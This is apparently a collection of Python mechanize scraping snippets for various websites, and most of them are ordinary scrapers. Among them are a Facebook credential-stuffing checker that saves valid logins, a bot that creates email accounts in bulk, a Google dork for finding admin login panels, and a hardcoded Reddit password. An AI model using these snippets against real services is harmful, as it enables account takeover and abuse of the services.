def get_data ():

    html = scraperwiki.scrape (edd_url)
    process_ex_dividend_data  (html)
    
    br = Browser()
    br.set_handle_robots (False)
    br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
    br.open (edd_url)    
    
    links = {}
    for link in br.links():
        if link.text in ['2', '3', '4']:
            links [link.text] = link.url
    for k, link in links.items():
        m = re.search (edd_pat, link)

        br = Browser()
        br.set_handle_robots (False)
        br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
        br.open (edd_url)    
        br.select_form(nr=0)
        br.set_all_readonly(False)
        br["__EVENTTARGET"] = m.group(1)
        br["__EVENTARGUMENT"] = ''
        for c in br.controls:
            if c.type == 'submit':
                c.disabled = True
        response = br.submit()
        process_ex_dividend_data (response.read())
Example #2
def get_browser():
    # Browser
    br = Browser()

    # Cookie Jar
    #cj = cookielib.LWPCookieJar()
    #br.set_cookiejar(cj)

    # Browser options
    br.set_handle_equiv(True)
    br.set_handle_gzip(True)
    br.set_handle_redirect(True)
    br.set_handle_referer(True)
    br.set_handle_robots(False)

    # Follows refresh 0 but not hangs on refresh > 0
    #br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)

    # Want debugging messages?
    #
    #br.set_debug_http(True)
    #br.set_debug_redirects(True)
    #br.set_debug_responses(True)

    # User-Agent (this is cheating, ok?)
    br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]

    return br
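A minimal usage sketch for the helper above; the target URL is only a placeholder.
# Hypothetical usage of get_browser(); example.com stands in for a real site.
br = get_browser()
resp = br.open('http://example.com')
print resp.read()[:200]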
def check(acs):
    for a in acs:
        try:
            a = a.rsplit()[0]
        except:
            pass
        try:
            if a:
                a = a.split(':')
                user = a[0]
                passw = a[1]
                br = Browser()
                br.set_handle_gzip(True)
                br.set_handle_robots(False)
                br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
                br.open('http://m.facebook.com/login.php')
                br.select_form(nr=0)
                br.form['email'] = user
                br.form['pass'] = passw
                br.submit()
                if 'm.facebook.com/login.php' in br.geturl() or 'checkpoint' in br.geturl() or 'to confirm your account with Facebook.' in br.response().read():
                            print "Could not login with " + str(a)

                else:
                    print "Logged in with " + user
                    opn = open(newfile, 'a')
                    opn.write(user + ":" + passw + '\n')
                    opn.close()

        except:
            print "Could not login with " + str(a)
Example #4
def begin_scraper():
  br = Browser()
  br.addheaders = [('User-agent', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_8; rv:16:0) Gecko/20100101 Firefox/16.0')]
  br.set_handle_robots(False)
  br.open("https://wwws.mint.com/login.event")
  assert br.viewing_html()
  formcount=0
  for f in br.forms():
    if str(f.attrs["id"]) == "form-login":
      break
    formcount = formcount+1
  
  br.select_form(nr=formcount)

  br["username"] = "******" #Put your username here
  br["password"] = getpass()
  
  
  #import pdb; pdb.set_trace()
  # Submit the user credentials to login to mint 
  response = br.submit()
  response = br.follow_link(text="Transactions")
  links_to_transactions = br.links(text_regex="Export all \d+ transactions")
  link = ""
  for f in links_to_transactions:
    link = f

  response2 = br.follow_link(link)
  text_file = open("transactions.csv", "w")
  text_file.write(response2.read())
  text_file.close()
Example #5
def github_connect(path=""):
    """Connect to the website"""
    br = Browser()
    br.set_handle_robots(False)
    br.addheaders = [('User-agent', 'Firefox')]
    br.open('https://github.com/%s' % path)
    return br
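A hedged usage sketch for github_connect; the profile path below is illustrative only.
# Hypothetical call: open a GitHub profile page and print its title.
gh = github_connect('torvalds')
print gh.title()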
Example #6
def login(url):
    # Use mechanize to get the set name URLs to scrape
    br = Browser()
    br.addheaders = [('User-Agent', ua)]
    br.open(url)

    # Select the form
    for form in br.forms():
        if form.attrs['id'] == 'loginFrm':
            br.form = form
            break

    br["email"] = EMAIL # replace with email
    br["password"] = PASSWORD # replace with password

    # Submit the form
    br.submit()

    for form in br.forms():
        if form.attrs['id'] == 'pop_report_form':
            br.form = form
            break

    br['sport_id'] = ['185223']
    br['set_name'] = "T206"
    br.submit(name="search")

    # Follow link to the correct set
    br.follow_link(url="http://www.beckett.com/grading/set_match/3518008")

    return br.response().read()
Example #7
def returnMnemonics(var):
    from mechanize import Browser
    from bs4 import BeautifulSoup
    # var = "abase"
    br = Browser()
    br.set_handle_robots(False)
    br.set_handle_equiv(False)
    br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
    url= 'http://mnemonicdictionary.com/?word=' + str(var)
    br.open(url)

    soup_mn = BeautifulSoup(br.response().read())

    # <div style="padding-top: 10px;">
    count_mn=0
    mnemonics=""
    for i in soup_mn.find_all('div',{'style':'padding-top: 10px;'}):

        soup2 = BeautifulSoup(str(i))
        for x in soup2.find_all('div', {'class':'row-fluid'}):
            soup3 = BeautifulSoup(str(x))

            for y in soup3.find_all('div', {'class':'span9'}):
                count = 0
                # print count_mn
                if count_mn==3:
                    break
                count_mn = count_mn+1
                if y is not None:
                    for z in y:
                        if count == 2:
                            # print z
                            mnemonics = mnemonics+z.strip().replace(','," ").replace('\n', '').replace(".","")+","
                        count = count+1
    return mnemonics
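A usage sketch based on the sample word left in the comment inside returnMnemonics.
# "abase" is the commented-out example word from the function above.
print returnMnemonics("abase")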
Example #8
    def get_browser(self):
        """
        Each FAUrl object stores it's own browser instance. On the first call
         it is created and if the username and password is set it will
         authenticate you.

        :return: mechanize.Browser instance.
        :raise: FAiler.FAError if FA is down. Time to F5!
        :raise: FAiler.FAAuth Your username and password failed
        """
        if self._br is None:
            br = Browser()
            br.set_handle_robots(False)
            br.set_handle_redirect(True)
            br.set_handle_referer(True)
            br.set_handle_equiv(True)
            br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
            if self._username is not None and self._password is not None:
                loginPage = 'https://www.furaffinity.net/login'
                try:
                    br.open(loginPage)
                except urllib2.HTTPError:
                    raise FAError("FA's down, F5 time.")
                br.form = br.global_form()
                br.form['name'] = self._username
                br.form['pass'] = self._password
                br.form.method = 'POST'
                br.submit()
                if br.geturl() == loginPage + '/?msg=1':
                    raise FAAuth('Username & Password Incorrect')
            self._br = br
        return self._br
def respond(permalink, text):
    br = Browser()
    user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1'
    br.addheaders = [('User-agent', user_agent)]

    soup = BeautifulSoup(br.open(permalink).read())

    urlopen = urllib2.urlopen
    Request = urllib2.Request
    encode = urllib.urlencode
    cj = cookielib.LWPCookieJar()

    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
    urllib2.install_opener(opener)

    root_comment = soup.find('form', attrs={'class': 'usertext border'})
    thing_id = root_comment.find('input', attrs={'name': 'thing_id'})['value']
    print 'thing_id', thing_id

    # LOG THE F**K IN
    req = Request('http://www.reddit.com/api/login/username', encode({'user': '******', 'passwd': 'hackny', 'api_type': 'json'}), {'User-Agent': user_agent})
    req_open = urlopen(req)
    read = json.loads(req_open.read())

    modhash = read['json']['data']['modhash']

    # POST THE F*****G COMMENT
    req = Request('http://www.reddit.com/api/comment', encode({'thing_id': thing_id, 'text': text + '\n\n*This is an automated response.*', 'uh': modhash}), {'User-Agent': user_agent})
    req_open = urlopen(req)
    read = json.dumps(req_open.read())
def scrap_query(query, bang=None):

    r = ddg_query('imdb ' + query, bang=bang)
    if 'redirect' in dir(r) and 'primary' in dir(r.redirect):
        url = r.redirect.primary
    else:
        logger.info('Could not find imdb searchpage from DuckDuckGo bang')
        return None

    br = Browser()
    br.set_handle_robots(False)
    br.addheaders = [('User-agent', 'Mozilla/5.0 (Windows NT 6.2;\
                        WOW64) AppleWebKit/537.11 (KHTML, like Gecko)\
                        Chrome/23.0.1271.97 Safari/537.11')]

    r = br.open(url)
    soup = BeautifulSoup(r)


    for link in soup.find_all('a'):
        href = link.get('href','')
        match = re.search(r"imdb\.com/.*tt(?P<number>[^/]*)", href)
        if match:
            imdb_id = check_imdb(match.group('number'))
            return imdb_id

    return None
Example #11
 def createbrowser(self):
     br = Browser()
     br.set_handle_gzip(True)
     br.set_handle_robots(False)
     br.set_handle_redirect(True)
     br.addheaders = [('User-agent', 'Mozilla/5.0 (iPhone; U; CPU iPhone OS 5_1 like Mac OS X; en-US) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B179 Safari/7534.48.3')]
     return br
def scrape_info():
	browser = Browser()
	browser.set_handle_robots(False)
	browser.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]

	parkIds = []
	for name in config['names']:
		browser.open("https://www.recreation.gov")
		browser.select_form(nr=0)
		browser['locationCriteria'] = name

		response = browser.submit()
		content = response.read()

		soup = BeautifulSoup(content, 'html.parser')
		scripts = soup.select('script')
		for script in scripts:
			if 'SuggestedPlaces' in str(script):
				jsonStr = str(script).strip('<script>var SuggestedPlaces = ').strip(';</script>')
				places = json.loads(jsonStr)
				query = urlparse.parse_qs(places[0]['value'])
				if 'parkId' in query:
					print('FOUND!: ' + unicode(query['parkId'][0]))
					parkIds.append(unicode(query['parkId'][0]))
				else:
					print('No results for ' + name + ': ' + places[0]['value'])

	pprint(parkIds)
Example #13
def searchTitle(rawtitle):
	br = Browser()
	# Ignore robots.txt
	br.set_handle_robots( False )
	# Google demands a user-agent that isn't a robot
	br.addheaders = [('User-agent', 'Firefox')]
	
	br.open( "http://www.google.com " )
	br.select_form( 'f' )
	s='imdb'+' + '+' '.join(re.compile('[\.]').split(rawtitle))
	br.form[ 'q' ] = s
	br.submit()

	resp = None
	for link in br.links():
		siteMatch = re.compile( 'www.imdb.com/title/tt[0-9]*/$' ).search( link.url )
		if siteMatch:
		    resp = br.follow_link( link )
		    print link.url
		    break

	soup = BeautifulSoup(resp.get_data())
	
	title = re.sub(' - IMDb','',soup.find('title').string)
	title = re.sub('\([0-9]*\)','',title)
	
	return title
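A hypothetical call with a dot-separated release name, matching the split on '.' inside searchTitle.
# Illustrative title string; any dot-separated release name works the same way.
print searchTitle("The.Matrix.1999")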
def generateSentence(var):
    br = Browser()
    br.set_handle_robots(False)
    br.set_handle_equiv(False)
    br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
    url= 'http://www.oxforddictionaries.com/definition/english/' + str(var)
    # url= 'https://www.google.co.in/search?q=define+utilitarian'
    try:
        br.open(url)
    except:
        print "what word is this, man? " + var
        return
    soup = BeautifulSoup(br.response().read())
    sentence=""
    counter=0
    for i in soup.find_all('ul',{'class':'sentence_dictionary'}):
        if i is not None:
            soup2 = BeautifulSoup(str(i))
            for j in soup2.find_all('li',{'class':'sentence'}):
                if j is not None:
                    sentence = sentence + str(counter+1)+") "+j.string.replace(',',' ').strip()+"\n"
                    counter+=1
                    if counter == 2:
                        return sentence
    return sentence
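A usage sketch using the word from the commented-out Google define URL above.
# "utilitarian" comes from the commented query inside generateSentence.
print generateSentence("utilitarian")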
def process(time):
    br = Browser()
    # Ignore robots.txt
    br.set_handle_robots( False )
    # Google demands a user-agent that isn't a robot
    br.addheaders = [('User-agent', 'Firefox')]
    br.open("http://heasarc.gsfc.nasa.gov/cgi-bin/Tools/xTime/xTime.pl")

    br.select_form("form")

    br["time_in_i"] = time # Enter your time in here in the format "2015-06-27 04:23:23.68"

    response=br.submit()

    html=response.read()
    soup = BeautifulSoup(html)


    table =soup.find("table", border=5)

    g = table.findAll('tr')
    row= g[7] #Select the correct row

    cols = row.findAll('td')
    value = cols[1].string #This is the MET time

    return value
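A usage sketch with a timestamp in the format noted in the comment inside process().
# Hypothetical conversion; the timestamp format follows the in-code comment.
met = process("2015-06-27 04:23:23.68")
print met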
def testPx(px):
  B=Browser()
  B.addheaders = [('User-agent', userAgents[randint(0,len(userAgents)-1)])]
  B.set_proxies(px)
  try:
    B.open('http://graphicriver.net/',timeout=5)
    pxQ.put(px)
    print(px['http']+"  ok")
    
    B.open('http://graphicriver.net/category/all',timeout=5)
  except:
    print(px['http']+"  error")
  page = pageQ.get()
  try:  
#    pass
#  finally:
    count=0
    while(count<5):
      O = B.open('http://graphicriver.net/category/all?page='+str(page),timeout=8)
      turls = lxml.html.document_fromstring(O.get_data()).xpath('//div[@class="item-info"]/h3/a/@href')
      for url in turls:
        urlsQ.put(url)
      print(str(page)+" got")  
      pageDoneQ.put(page)
      page = pageQ.get()
      count+=1
  except:  
    pageQ.put(page)
    print(str(page)+" error")
Example #17
def login_url(
                url,
                login,
                passwd,
                form_nomber,
                login_name,
                paswd_name,
                submit_nomber
            ):
    br = Browser(); showMessage('Creating the browser interface')
    cj = cookielib.LWPCookieJar()
    br.set_cookiejar(cj)
    br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]

    br.open(url); showMessage('Loading the site and logging in')
    br.select_form(nr = form_nomber)
    br[login_name] = login
    br[paswd_name] = passwd

    res = br.submit(nr = submit_nomber)
    content = res.read()
    # determine the number of pages
    maxPage = int(max_page(content)); showMessage('Determining the number of pages and jumping to the last one')
    curPage = 84
    while curPage < maxPage:
        res = br.open('http://forum.rsload.net/cat-kryaki-seriyniki-varez/topic-4820-page-%d.html' % (maxPage))
        curPage = maxPage
        maxPage = int(max_page(content))
        content = res.read()
    # parse the keys
    if get_all_keys(content):
        webbrowser.open_new_tab('http://forum.rsload.net/cat-kryaki-seriyniki-varez/topic-4820-page-%d.html' % (maxPage))  # returns True and opens a new tab
def getRandomXKCDComic(urlBase):
    br = Browser()
    br.addheaders = [('User-agent', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9')]
    br.set_handle_robots(False) 


    #XKCD Comics are enumerated in the following type by URL: http://www.xkcd.com/1, http://www.xkcd.com/2, ..., http://www.xkcd.com/n
    upperBound = 1
    lowerBound = 1

    #Multiply by two until address no longer exists
    while True:
        link = urlBase + str(upperBound) + "/"
        try:
            response = br.open(link)
        except:
            break

        lowerBound = upperBound
        upperBound = upperBound * 2

    #Binary Search for last Comic
    while True:
        pivot = (upperBound + lowerBound)/2
        link = urlBase + str(pivot) + "/"

        if lowerBound == upperBound or pivot == lowerBound:
            randomComicID = random.randint(1, pivot)
            randPageLink = urlBase + str(randomComicID) + "/"
            return br.open(randPageLink)
        try:
            response = br.open(link)
            lowerBound = pivot
        except:
            upperBound = pivot
Example #19
def get_machines(start,num_pages):
    mech = Browser()
    mech.set_handle_robots(False)
    mech.set_handle_equiv(False) 
    mech.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]

    machines = []
    try:
        page_num = 0
        for page_num in range(start,num_pages+1):
            print("page %d" % (page_num))
            url = "http://www.pinpedia.com/machine?page=%d" % page_num
            html_page = mech.open(url)
            html = html_page.read()
            machines += parse_page(html)
            time.sleep(0.1)
    except Exception as e:
        print e
        print("finished at page %s" % page_num)

    print("storing machines to machines.txt")

    with open('machines.txt','w') as fh:
        for machine in machines:
            fh.write(machine + "\n")
Example #20
	def google(self):
		print("\n\t[!] Searching on Google...\n")

		if self.dork == None:
			query = "site:" + self.target.replace("http://", "").replace("https://", "") + " inurl:(login||adm||admin||admin/account||controlpanel||adminitem||adminitems||administrator||administration||admin_area||manager||letmein||superuser||access||sysadm||superman||supervisor||control||member||members||user||cp||uvpanel||manage||management||signin||log-in||log_in||sign_in||sign-in||users||account)"
		else:
			query = "".join(self.dork)
			query = query.strip("'")

		print("[DORK] >> " + query)

		try:
			query = query.replace(" ", "+")
			req = "https://www.google.com.br/search?q=%s&num=50&start=0" % query
			br = Browser()
			br.set_handle_robots(False)
			br.addheaders = [("User-agent", "chrome")]
			html = br.open(req).read() 
			soup = BeautifulSoup(html, "html5lib")

			with open("./output/google-%s.txt" % self.target[8:], "w") as log:
				for results in soup.findAll(attrs={"class":"g"}):
					for title in results.findAll("h3", attrs={"class":"r"}):
						t = title.text
						t = t.title()
					for link in results.findAll(attrs={"class":"s"}):
						l = link.cite.text
						print (t)
						print (l + '\n')
						log.write(str(l) + '\n')
		
		except Exception as e:
			print(e)
Example #21
def fetchFromBaidu():
    browser = Browser(history = NoHistory())
    browser.set_handle_robots(False)
    browser.addheaders = USER_AGENT
    page = browser.open(url)
    browser.select_form(name="f1")
    browser['word'] = "西洋美人"
    page = browser.submit()
    
    if 'Redirecting' in browser.title():
        resp = browser.follow_link(text_regex='click here')
    
    soup = bs(page.read())
    for image in soup.findAll("img"):
        try:
            print "Image: %(src)s" % image
            filename = image["src"].split("/")[-1]
            if fnmatch("*.jpg", filename) or fnmatch("*.jpeg", filename):
                parsed[2] = image["src"]
                outpath = os.path.join(out_folder, filename)
                if image["src"].lower().startswith("http"):
                    urlretrieve(image["src"], outpath)
                else:
                    urlretrieve(urlparse.urlunparse(parsed), outpath)
        except KeyError:
            continue
Example #22
    def __init__(self, config):
        self.login_url = 'http://%s.ogame.gameforge.com/' % config.country
        # http://s114-br.ogame.gameforge.com/game/index.php?page=overview
        self.index_url = 'http://s%s-%s.ogame.gameforge.com' % (config.universe, config.country) + '/game/index.php'
        headers = [('User-agent', 'Mozilla/5.0 (Windows NT 10.0; WOW64) \
        AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36')]
        # Authentication data
        self.username = config.username
        self.password = config.password
        self.universe = config.universe
        self.country = config.country

        self.logger = logging.getLogger('ogame-bot')
        # Setting up the browser
        self.cj = cookielib.LWPCookieJar()

        br = Browser()
        br.set_cookiejar(self.cj)
        br.set_handle_robots(False)
        br.addheaders = headers
        # self.path = os.path.dirname(os.path.realpath(__file__))
        # name of the cookies file
        # self.cookies_file_name = os.path.join(self.path, 'cookies.tmp')
        self.cookies_file_name = 'cookies.tmp'
        super(AuthenticationProvider, self).__init__(br, config)
Example #23
def create():
    while 1:
        try:
            br = Browser()
            br.set_handle_robots(False)
            br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
            br.open('https://classic.netaddress.com/tpl/Subscribe/Step1?Locale=en&AdInfo=&Referer=http%3A%2F%2Fwww.netaddress.com%2F&T=1332304112864372')
            br.select_form(name='Step1')
            userid = randomname()
            br.form['usrUserId'] = userid
            pwd = randomname()
            br.form['newPasswd'] = pwd
            br.form['RPasswd'] = pwd
            br.form['usrFirst'] = randomname()
            br.form['usrLast'] = randomname()
            br.form['usrTimeZone'] = ['Africa/Abidjan']
            br.form['usrCn'] = ['AF']
            br.submit()
            print "Created " + userid + " with password " + pwd
            filo = open(filex, 'a')
            filo.write(userid + "@usa.net" + ":" + pwd + "\n")
            filo.close()

        except:
            print "error"
def get_google_news_by_url(url):

    # Construct browser object
    browser = Browser()
    ua = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36'
    browser.addheaders = [('User-Agent', ua), ('Accept', '*/*')]

    # Do not observe rules from robots.txt
    browser.set_handle_robots(False)

    # Create HTML document
    html = fromstring(browser.open(url).read())

    # get number of pages
    xpath_pages = '//a[@class="fl"]'
    page_num = len(html.xpath(xpath_pages)) + 1

    # get all pages url
    urls = generate_url_pages(url, page_num)
    print 'On ' + str(len(urls)) + ' pages:'

    df = [None] * page_num

    # iterate through all pages of this url
    for index, url in enumerate(urls):
        page_html = fromstring(browser.open(url).read())
        df[index] = get_google_news_in_page(page_html)

    return pd.concat(df, ignore_index=True)
def find_first_article():
    mech = Browser()
    cj = cookielib.LWPCookieJar()

    mech.set_handle_equiv(True)
    # mech.set_handle_gzip(True)
    mech.set_handle_redirect(True)
    mech.set_handle_referer(True)
    mech.set_handle_robots(False)
    # mech.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
    mech.addheaders = [
        (
            "User-agent",
            "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1",
        )
    ]

    page = mech.open("https://bitcointalk.org/index.php?board=77.0")
    html = page.read()

    soup = BeautifulSoup(html)

    first_article_tag = soup.find("td", class_="windowbg")

    global startingpost
    startingpost = first_article_tag.span.a.get("href")
    print startingpost
Example #26
    def scrape(self):
        """
        Opens the html page and parses the pdf links.
        """
        browser = Browser()

        #-----------
        user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'
        values1 = {'name' : 'Michael Foord',
                   'location' : 'Northampton',
                   'language' : 'Python' }
        headers = { 'User-Agent' : user_agent }
        browser.set_handle_redirect(True)
        browser.set_handle_referer(True)
        browser.set_handle_robots(False)
        browser.addheaders = [('User-Agent', 'Firefox')]
        #-------------

        browser.set_handle_robots(False)

        html = browser.open(self.site)

        lines = html.read().splitlines()

        for line in lines:
            urls = re.findall('<a href="?\'?([^"\'>]*)', line)
            for url in urls:
                if '.pdf"' in url:
                    self.pdf_urls.append(url)
def extract_article_url(posturl):
    mech = Browser()
    cj = cookielib.LWPCookieJar()

    mech.set_handle_equiv(True)
    # mech.set_handle_gzip(True)
    mech.set_handle_redirect(True)
    mech.set_handle_referer(True)
    mech.set_handle_robots(False)
    # mech.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
    mech.addheaders = [
        (
            "User-agent",
            "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1",
        )
    ]

    page = mech.open(posturl)
    html = page.read()

    global soup
    soup = BeautifulSoup(html)

    global articleURL
    # print soup.prettify()

    for item in soup.find_all("div", class_="post"):
        for link in item.find_all("a"):
            string = link.get("href")
            if prog.match(string):
                # find the link that is to the article (link outside of bitcointalk.org forum)
                articleURL = link.get("href")
                return link.get("href")
    return "No article url"
Example #28
 def parseFeeds(self):
     mech = Browser()
     mech.addheaders = [ ('User-agent', 'Mozilla/5.0 (compatible)') ]
     mech.set_handle_robots(False)
     for url in self.feedUrls:
     #url = "http://feeds.feedburner.com/PurdueEngNews?format=xml"
         page = mech.open(url)
         html = page.read()
         soup = BeautifulStoneSoup(html)
         headlines = []
         descriptions = []
         i=0
         self.newsList = []
         for item in soup.findAll('item'):
             if (i > 20):
                 break
             date = item.find('pubdate')
             title = item.find('title')
             link = item.find('link')
             desc = item.find('description')
             if (len(title.contents) > 0):
                 title2 = title.contents[0]
             else:
                 title2 = 'None'
             self.newsList.append(NewsStory(date.contents[0], title2, link.contents[0], \
                 desc.contents[0]))
             i+=1
         for story in self.newsList:
             headlines.append(story.title)
             descriptions.append(story.link)
             #story.display()
         self.headlineList.append(headlines)
         self.descList.append(descriptions)
     self.populateTopicList()
def google(query):
    print("\n\t[!] Searching on Google...\n")
    print("[QUERY] >> " + query)

    try:
        query = query.replace(" ", "+")
        req = "https://www.google.com.br/search?q=%s&num=50&start=0" % query
        br = Browser()
        br.set_handle_robots(False)
        br.addheaders = [("User-agent", "chrome")]
        html = br.open(req).read()
        soup = BeautifulSoup(html, "html5lib")

        with open("./output/google-%s.txt" % query[8:], "w") as log:
            for results in soup.findAll(attrs={"class": "g"}):
                for title in results.findAll("h3", attrs={"class": "r"}):
                    t = title.text
                    t = t.title()
                    for link in results.findAll(attrs={"class": "s"}):
                        l = link.cite.text
                        print(t)
                        print(l + '\n')
                        log.write(str(l) + '\n')

    except Exception as e:
        print(e)
def cmdlogin(account,username,password,verbose):#login function for cmd tools
	#Actually this code applies only to otenet logins.
	testfoo=Browser()
	testfoo.set_handle_robots(False)
	login_page=acc_openlogin[str(account)]#find url
	foobar.addheaders = [("User-agent", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)")]#add headers
	testfoo.addheaders = [("User-agent", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)")]#add headers
	try:
		if verbose:
			print "Opening url --> "+login_page
		foobar.open(login_page)#open url
	except:
		sys.exit("ERROR: Check your internet connection and try again...")
	if verbose:
		print "Connection established"
	if account=="otenet":
		foobar.select_form(name="loginform")
	elif account!="otenet":
		foobar.select_form(nr=0)
	if account == "voipbuster":
		foobar["login[username]"] = username
		foobar["login[password]"] = password
	elif account != "forthnet":
		foobar["username"] = username
		foobar["password"] = password
	else:
		foobar["Username"] = username
		foobar["Password"] = password
	try:
		if verbose:
			print "Verifying data..."
		foobar.submit()
	except:
		sys.exit("ERROR: Check your internet connection and try again...")
	time.sleep(2) #create a small delay
	ok=0
	testfoo=foobar
	repeat=0
	while repeat<=2:# Do 3 login attempts just in case there is a network error or something
		try:
			time.sleep(1)
			leftcred=creditsleft(account,testfoo,verbose)
			break
		except:
			repeat=repeat+1# increase login attempts
			if repeat <= 3:
				if verbose:
					print "Retrying to login...("+str(repeat)+"/3)"
			else:# in case all of them failed
				sys.exit("Cannot login to "+account+". Invalid credentials or network error. Please try again :-)")
	if verbose:
		print "Logged in to "+account
		if account=="otenet" or account =="forthnet":
			print "SMS left: "+str(leftcred)
		elif account!="otenet" and account!="forthnet":
			print "Credits left: "+str(leftcred)
	if leftcred<="0.03":
		sys.exit("You cant send more messages today :-(")
	return leftcred
Example #31
def open_browser(url):
    '''
    INPUT: string containing url to open
    OUTPUT: browser object
    open the requested page and return a browser object
    '''
    br = Browser()  # Initialize browser object
    br.addheaders = [('User-agent', 'Firefox')]
    br.open(url)  # Retrieve the requested page
    br.select_form(nr=0)
    return br
Example #32
def get_data_urls(url):
    br = Browser()
    br.set_handle_robots( False )
    br.addheaders = [('User-agent', 'Firefox')]

    # Retrieve the requested page, saving the response
    br.open(url)
    data_urls = []
    for link in br.links(url_regex="ssl.berkeley.edu"):
        data_urls.append(link.url)
    return data_urls
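A hedged usage sketch; the start URL is an assumption, since the function only keeps links that point at ssl.berkeley.edu.
# Hypothetical entry page; any page linking to ssl.berkeley.edu would do.
for data_url in get_data_urls('http://setiathome.berkeley.edu/'):
    print data_url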
Example #33
 def no_js_get_source(self):
     br = Browser()
     br.set_handle_equiv(True)
     br.set_handle_referer(True)
     br.set_handle_robots(False)
     br.set_cookiejar(LWPCookieJar())
     br.addheaders = [('User-agent', USER_AGENT)]
     br.set_handle_refresh(_http.HTTPRefreshProcessor(), max_time=10)
     try:
         return br.open(self.url).read()
     except:
         exit('[!] Failed to fetch html source')
Example #34
 def getRoundPage(self, i):
     br = Browser()
     br.addheaders = [('User-agent', 'Firefox')]
     br.open(self.url)
     if i is not None:
         br.select_form(name="selectRound")
         br['selCount'] = [str(i)]
         br.submit()
     else:
         i = 0
     soup = BeautifulSoup(br.response().read(), features='html.parser')
     return soup
Example #35
def query_timetree(taxon_a, taxon_b):
    '''Mechanize is used to query the web interface of TimeTree with two taxa
       and returns the result page after submitting the query form.'''
    br = Browser()
    br.addheaders = [('User-agent', 'Firefox')]
    br.set_handle_robots(False)
    br.open("http://timetree.org")
    br.select_form(name="query_frm")
    br['taxon_a'] = taxon_a
    br['taxon_b'] = taxon_b
    resp = br.submit()
    html = resp.get_data()
    return html
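A hypothetical query with two example taxa passed straight into the TimeTree form.
# Illustrative taxa; the strings go directly into the taxon_a / taxon_b fields.
html = query_timetree("Homo sapiens", "Pan troglodytes")
print len(html)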
Example #36
def test():
    from mechanize import Browser
    USER_AGENT = "Mozilla/5.0 (X11; U; Linux i686; tr-TR; rv:1.8.1.9) Gecko/20071102 Pardus/2007 Firefox/2.0.0.9"
    br = Browser()
    br.addheaders = [("User-agent", USER_AGENT)]
    
    url = "https://login.yahoo.co.jp/config/login?.src=&.done=http%3A//www.yahoo.co.jp/"
    br.open(url)
    br.select_form("login_form")
    br['login'] = "******"
    br['passwd'] = "877877"
    response = br.submit()
    print response.read()
def ma_dv_hotline(cityName):
    br = Browser()
    br.set_handle_robots(False)  # ignore robots
    br.set_handle_refresh(False)  # can sometimes hang without this
    br.addheaders = [('User-agent', 'Firefox')]
    br.open("https://findhelp.janedoe.org/find_help/search")
    br.select_form(id="searchprograms")
    br["city"] = [cityName]
    response = br.submit()
    cleanResponse = response.read().decode(
        "utf-8")  #get rid of bytes-type error and white space
    cleanResponse = cleanResponse.replace('<!DOCTYPE html>', '')
    return cleanResponse
def read_all_result_page_links_for(mainurl):
    br = Browser()
    br.set_handle_robots(False)
    br.addheaders = [(
        'User-agent',
        'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1'
    )]

    br.open(mainurl)
    nice_links = [l for l in br.links() if 'company' in l.url]

    for link in nice_links:
        read_detail_page(link.url)
Example #39
 def _download_metadata():
